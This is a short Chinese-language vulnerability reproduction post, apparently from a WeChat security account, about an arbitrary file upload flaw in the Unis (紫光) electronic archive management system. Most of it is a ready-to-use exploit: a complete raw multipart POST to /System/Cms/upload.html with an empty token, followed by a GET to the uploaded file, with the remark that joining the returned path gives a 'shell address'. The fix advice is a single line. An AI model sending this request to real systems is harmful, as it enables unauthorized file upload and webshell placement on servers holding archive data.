0x01 前言
0x02 影响平台
紫光电子档案管理系统
0x03 漏洞复现
页面是这个酱紫
EXP:
POST /System/Cms/upload.html?token= HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 544
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3enKbCUwg60aGZcr
------WebKitFormBoundary3enKbCUwg60aGZcr
Content-Disposition: form-data; name="userID"
admin
------WebKitFormBoundary3enKbCUwg60aGZcr
Content-Disposition: form-data; name="fondsid"
1
------WebKitFormBoundary3enKbCUwg60aGZcr
Content-Disposition: form-data; name="comid"
1
------WebKitFormBoundary3enKbCUwg60aGZcr
Content-Disposition: form-data; name="token"
1
------WebKitFormBoundary3enKbCUwg60aGZcr
Content-Disposition: form-data; name="files[]"; filename="11.txt"
12345ewq
------WebKitFormBoundary3enKbCUwg60aGZcr--
Success~
GET /uploads/company1/fonds1/cms/20230914/UNIS-STSivEtrODyRfIA6JpxQDoBlO.txt HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=c9e1867ad3766cf83d294ff7f74663f8
Connection: close
将响应包地址拼接即可得到shell地址。
http://ip:port/uploads/company1/fonds1/cms/20230914/UNIS-STSivEtrODyRfIA6JpxQDoBlO.txt
0x04 参考来源
https://mp.weixin.qq.com/s/YAVLMwMG1IusJ1kUCXwl1w
0x05 修复方案
建议及时更新至最新版本!
往期回顾
关注我
获得更多精彩
觉得内容不错,就点下“赞”和“在看”
如侵权请私聊公众号删文